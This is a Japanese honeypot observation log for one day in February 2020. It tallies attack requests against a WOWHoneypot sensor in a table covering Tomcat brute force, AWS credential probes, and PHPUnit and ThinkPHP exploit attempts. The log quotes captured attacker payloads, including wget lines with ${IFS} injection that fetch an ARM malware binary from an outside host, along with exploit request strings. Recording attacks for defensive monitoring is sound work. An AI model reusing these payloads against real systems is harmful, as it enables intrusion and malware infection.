WOWHoneypot観察(322日目)
2020/02/02(日)
トータルは269件でした。
ハンティングログは以下です。
46.166.187[.]111 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7 |
89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7 |
89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7 |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
163 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
44 | 調査 | GET /script |
35 | アクセス | GET / |
6 | 調査 | GET /is_test |
5 | AWSの認証情報の調査 | GET /.aws/credentials |
3 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | PHPUnitの脆弱性(CVE-2017-9841)を狙った通信 | POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
1 | GPONルーターの調査 | POST /GponForm/diag_Form?images/ |
1 | Solrの調査 | GET /solr/admin/info/system?wt=json |
1 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
1 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
1 | 調査 | GET /logs |
1 | ThinkPHPの脆弱性を狙った通信 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP |
1 | phpMyAdminの調査 | GET /admin-scripts.asp |
1 | 不明 | GET /?f=search&m=index&keyword=aaa%2527%256F%2572%2520%2575%2570%2564%2561%2574%2565%2578%256D%256C%2528%2531%252C%2563%256F%256E%2563%2561%2574%2528%2531%252C%256D%2564%2535%2528%2531%2529%2529%252C%2531%2529%2523 |
1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&content= |
1 | リモートデバッグの調査 | GET /?XDEBUG_SESSION_START=phpstorm |
1 | 不正中継の試み | CONNECT ip.ws.126.net:443 |